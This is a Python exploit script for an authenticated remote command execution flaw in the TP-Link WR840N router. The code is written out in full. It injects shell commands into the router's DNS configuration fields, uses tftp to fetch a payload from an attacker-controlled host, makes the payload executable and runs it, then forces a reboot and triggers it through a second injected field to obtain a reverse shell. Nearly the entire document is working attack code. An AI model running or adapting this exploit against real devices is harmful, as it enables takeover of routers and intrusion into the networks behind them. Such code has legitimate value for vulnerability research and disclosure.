#!/usr/bin/python # -*- coding: utf-8 -*- # Author: Samir Sanchez Garnica and Luis Jacome Valencia # Description: This script exploits a remote command execution vulnerability under the oal_setIp6DefaultRoute component in the TPLink WR840N router. import requests import base64 import argparse class RCE(): def __init__(self, ip, username, password, lhost): self.ip = ip self.username = username self.password = password self.lhost = lhost self.session = requests.Session() self.command_1 = ";tftp -g -r s -l /var/tmp/dconf/s {}".format(self.lhost) self.command_2 = ";chmod +x /var/tmp/dconf/s" self.command_3 = ";./var/tmp/dconf/s" def base64_encode(self, s): msg_bytes = s.encode('ascii') return base64.b64encode(msg_bytes) def exploit(self): # Building the malicious packet self.url = "http://" + self.ip + "/cgi?2" self.proxyes = {} self.stage_1 = '[NOIP_DNS_CFG#0,0,0,0,0,0#0,0,0,0,0,0]0,5\r\nenable=1\r\nuserName={0}\r\npassword={1}\r\nuserDomain={2}\r\nlogin=1\r\n'.format(self.command_1, self.command_2, self.command_3) self.stage_2 = '[L3_IP6_FORWARDING#0,0,0,0,0,0#0,0,0,0,0,0]0,3\r\n__ifAliasName=ewan_ipoev6_d\r\n__ifName=;reboot;\r\ndefaultConnectionService=\r\n' self.stage_3 = '[L3_IP6_FORWARDING#0,0,0,0,0,0#0,0,0,0,0,0]0,3\r\n__ifAliasName=ewan_ipoev6_d\r\n__ifName=;sh */t*/d*/n*;\r\ndefaultConnectionService=\r\n' self.headers = { 'Host': self.ip, 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0', 'Accept': '*/*', 'Accept-Language': 'es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'text/plain', 'Content-Length': 'str(len(self.payload))', 'Origin': 'http://'+str(self.ip), 'Referer': 'http://'+str(self.ip)+'/mainFrame.htm', } self.cookies = { 'Authorization' : 'Basic ' + self.base64_encode(self.username + ":" + self.password).decode('ascii') } self.response = self.session.post(self.url, headers=self.headers, cookies=self.cookies, data=self.stage_1, proxies=self.proxyes) if self.response.status_code == 200: print("[+] Sending Stage 1, allocate command in /var/tmp/dconf/noipdns.conf") try: self.response = self.session.post(self.url, headers=self.headers, cookies=self.cookies, data=self.stage_2, proxies=self.proxyes, verify=False, timeout=10) except: print("[+] Sending Stage 2, reboot device and get new configuration 2") input("[+] waiting reconnect to wireless device, press enter to send stage 3 and obtained reverse shell") self.response = self.session.post(self.url, headers=self.headers, cookies=self.cookies, data=self.stage_3, proxies=self.proxyes) if self.response.status_code == 200: print("[+] Getting reverse shell....") def main(): parser = argparse.ArgumentParser() parser.add_argument("--username", dest="username", help="Enter the administrator user of the router", required=True) parser.add_argument("--password", dest="password", help="Enter the admin password of the router", required=True) parser.add_argument("--target", dest="target", help="Enter router ip address", required=True) parser.add_argument("--lhost", dest="lhost", help="Enter your lhost server tfpt", required=True) args = parser.parse_args() if args.username and args.password and args.target and args.lhost: rce = RCE(args.target, args.username, args.password, args.lhost) rce.exploit() if __name__ == "__main__": main()